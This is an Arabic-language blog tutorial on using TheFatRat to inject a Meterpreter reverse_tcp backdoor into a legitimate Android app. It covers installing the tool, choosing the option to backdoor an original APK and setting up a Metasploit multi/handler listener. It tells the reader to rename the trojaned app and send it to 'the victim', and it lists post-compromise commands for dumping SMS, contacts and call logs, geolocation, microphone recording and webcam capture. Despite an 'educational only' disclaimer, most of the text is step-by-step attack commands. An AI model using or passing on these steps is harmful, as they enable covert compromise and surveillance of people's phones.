اختراق اجهزه الاندرويد عبر حقن التطبيقات من خلال اداة TheFatRat

في البداية هذا الشرح لـ اغراض تعليميه فقط !

سنقوم بـ استخدام اداه TheFatRat في هذا الدرس لـ حقن تطبيقات الاندرويد واختراق الاجهزه

تعتبر الاداه من اسهل الادوات في صنع باب خلفي “BackDoor” لـ اختراق الاجهزه وهي ليست محصوره فقط على صنع باك دور على الاندرويد بل ايضا ويندوز وماك

وهناك انواع عديده وخيارات تقدمها لك الاداه لتسهل مهمتك في الاختراق

ومن مميزات المشروع:

Create backdoor for windows , linux , mac and android

bypass antivirus backdoorr

Checks for metasploit service and starts if not present

Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another

Start multiple meterpreter reverse_tcp listners

Fast Search in searchsploit

Bypass AV

File pumper

Create backdoor with another techniq

Autorunscript for listeners ( easy to use )

Drop into Msfconsole

ولكن بهذا الشرح سنقوم بأستخدام الاداه في حقن تطبيقات الاندرويد

في البدايه نقوم بتحميل الاداه من هنا

git clone https://github.com/Screetsec/TheFatRat.git

تثبيت الاداه:

cd TheFatRat

chmod +x setup.sh && ./setup.sh

* قد ياخذ فتره من الوقت لـ التثبيت

بعد التثبيت نقوم بـ اعطاء ملفي fatrat و powerfull.sh صلاحيه من خلال تنفيذ الامرين التاليه:

chmod +x fatrat

chmod +x powerfull.sh

لـ تشغيل الاداه ننفذ الامر التالي:

fatrat/.

بعد تشغيل الاداه ستظهر لك قائمة بـ الخيارات !

[01] Create Backdoor with msfvenom
[02] Create Fud 100% Backdoor with Fudwin 1.0
[03] Create Fud Backdoor with Avoid v1.2
[04] Create Fud Backdoor with backdoor-factory
[05] Backdooring Original apk [Instagram, Line,etc]
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07] Create Backdoor For Office with Microsploit
[08] Trojan Debian Package For Remote Acces [Trodebi]
[09] Load/Create auto listeners
[10] Jump to msfconsole
[11] Searchsploit
[12] File Pumper [Increase Your Files Size]
[13] Configure Default Lhost & Lport
[14] Cleanup
[15] Help
[16] Credits
[17] Exit

بعد ذلك نقوم بـأختيار الخيار الخامس “Backdooring Original apk [Instagram, Line,etc]” لحقن تطبيق

ثم نقوم بـ أدخال الاي بي الخاص بنا والبورت

ثم نقوم بـ ادخال مسار التطبيق المراد حقنه

ثم نقوم بـ اختيار (android/meterpreter/reverse_tcp) كطريقه اتصال بيني وبين الهدف وهو اتصال عكسي

ثم ننتظر بعض الوقت حتى تاتينا رساله بأن تطبيقنا جاهز =D

Your RAT apk was successfully builded and signed , it is located here :
/home/xabdullah/TheFatRat/backdoored/app_backdoor.apk

الان نقوم بالدخول على مجلد backdoored

cd backdoored

الان تطبيقنا الي قمنا بحقنه موجود بأسم app_backdoor.apk نقوم بتغيير اسمه الى أي أسم ثم نقوم بـ ارساله الى الضحيه ( انت وطريقتك )

بعدها نقوم بالدخول على Metasploit لـسيطره على جهاز الضحيه

ثم نقوم بـ استخدام multi_handler لتساعدنا على الارسال والاستقبال والتحكم عبر الامر التالي:

use exploit/multi/handler

ثم سنقوم بتحديد البايلود الي سبق قمن بحقنه بالتطبيق من خلال الامر التالي:

set payload android/meterpreter/reverse_tcp

ثم سنقوم بوضع الاي بي الخاص بنا الي سبق ووضعناه كوسيله اتصال, من خلال الامر التالي :

set LHOST 192.168.1.134

وايضا نطبق نفس الامر لـ البورت من خلال الامر التالي:

set LPORT 4444

ثم نقوم بكتابه run

نلاحظ بأن لا يوجد اتصال ,,, ساقوم بتثبيت التطبيق الان ونلاحظ بأن الاتصال سيتم ( صوره متحركه )

والان تم اختراق الجهاز بنجاح ويمكنك تنفيذ اي امر مثل سحب رسائل sms او جهات الاتصال او فتح الكاميرا والكثير والكثير من الامور

وهذه قائمة لـ ما يمكنك فعله مع الضحيه

Command Description
——- ———–
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for “load”
uuid Get the UUID for the current session
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system’s local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
screenshot Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

Command Description
——- ———–
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam

Android Commands
================

Command Description
——- ———–
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information

اذا اردت تغيير ايقونه التطبيق

قم بنسخ الايقونه ثم توجه الى مجلد “TheFatRat/icons” ثم قبل بـتغيير اسم الايقونه الى (autorun.ico) ووافق على الاستبدال

وبكذا يكون انتهى الشرح,, اتمنى يكون واضح وسهل على الجميع, اذا كانت هناك معلومه ناقصه او غير صحيحه يمكنك مراسلتي بتويتر عبر حسابي 0xAbdullah جل من لا يخطئ.

0xabdullah

تقنية وامان